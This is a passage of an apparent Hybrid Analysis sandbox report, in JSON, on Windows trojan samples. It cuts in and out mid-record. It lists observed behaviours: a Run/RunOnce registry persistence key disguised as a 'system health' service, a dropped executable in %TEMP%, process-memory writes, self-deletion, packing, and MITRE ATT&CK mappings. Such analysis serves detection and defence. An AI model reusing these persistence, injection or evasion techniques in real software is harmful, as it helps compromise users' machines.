\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00004952)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has a section named \".eh_fram\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004844]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" wrote 16288 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 216)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 216)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 216)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511
https://hybrid-analysis.com/sample/6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511
Hybrid Analysis - Ransomware
{"size": 606072, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511", "sha256": "6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 142, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606076, "sha256": "22617a5462cd510bf288d362510aa0fe3ca1bba136e683569a380f74a203cf0c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe (PID: 4064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004064", "name": "6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe", "normalized_path": "C:\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe", "sha256": "6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511", "av_label": "Packer.Krap", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00002420", "parentuid": "00000000-00004064", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe *", "sha256": "22617a5462cd510bf288d362510aa0fe3ca1bba136e683569a380f74a203cf0c"}, {"uid": "00000000-00002924", "parentuid": "00000000-00002420", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZXVXZG", "sha256": "22617a5462cd510bf288d362510aa0fe3ca1bba136e683569a380f74a203cf0c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", 